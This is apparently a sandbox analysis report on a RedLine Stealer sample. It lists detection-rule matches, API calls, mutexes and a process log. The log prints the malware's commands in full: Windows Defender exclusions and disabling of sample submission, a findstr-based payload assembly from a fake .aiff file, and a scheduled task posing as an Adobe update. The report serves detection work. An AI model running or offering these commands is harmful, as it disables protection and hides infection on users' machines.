Source: 9.3.Rifiutare.exe.com.4680aa0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 9.3.Rifiutare.exe.com.4680aa0.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 9.3.Rifiutare.exe.com.4680aa0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 19.2.RegAsm.exe.580000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 19.2.RegAsm.exe.580000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 19.2.RegAsm.exe.580000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 9.3.Rifiutare.exe.com.4680aa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000013.00000002.2943468774.0000000000582000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: Rifiutare.exe.com PID: 2896, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@139/54@23/2

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe

Code function: 0_2_0040976C wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,

0_2_0040976C

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C91939 AdjustTokenPrivileges,CloseHandle,	7_2_00C91939
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Code function: 7_2_00C91F3D LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	7_2_00C91F3D
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A61939 AdjustTokenPrivileges,CloseHandle,	10_2_00A61939
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Code function: 10_2_00A61F3D LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	10_2_00A61F3D
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_00601939 AdjustTokenPrivileges,CloseHandle,	13_2_00601939
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Code function: 13_2_00601F3D LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	13_2_00601F3D

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe

Code function: 0_2_00402446 GetDiskFreeSpaceExW,SendMessageW,

0_2_00402446

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com

Code function: 7_2_00CBADEE CreateToolhelp32Snapshot,Process32FirstW,CompareStringW,Process32NextW,CloseHandle,

7_2_00CBADEE

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe

Code function: 0_2_004048CC _wtol,_wtol,SHGetSpecialFolderPathW,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,

0_2_004048CC

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe

Code function: 0_2_004039F0 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,GetProcAddress,GetProcAddress,wsprintfW,GetProcAddress,

0_2_004039F0

Source: C:\Windows\System32\wscript.exe

File created: C:\Program Files\RDP Wrapper\

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe

File created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6800:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4428:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5592:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\mnop
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4020:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3612:120:WilError_03

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\autC3EF.tmp

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\54.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"

Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs

Source: 8lOT1rXZp5.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 8lOT1rXZp5.exe	Virustotal: Detection: 53%
Source: 8lOT1rXZp5.exe	ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe

File read: C:\Users\user\Desktop\8lOT1rXZp5.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\8lOT1rXZp5.exe "C:\Users\user\Desktop\8lOT1rXZp5.exe"
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Process created: C:\Windows\SysWOW64\makecab.exe "C:\Windows\System32\makecab.exe"
Source: C:\Windows\SysWOW64\makecab.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c WEHuzypTIfJLQWpZ & HMYPflMZogRtPmKziXCRecxqxWV & rIgSHQwdwGHxUulRaOS & cmd < Adunazione.aiff
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com Rifiutare.exe.com D
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com D
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com Uno.exe.com f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com Inebriato.exe.com R
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com R
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata"""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\54.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\54.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53"
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\400.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
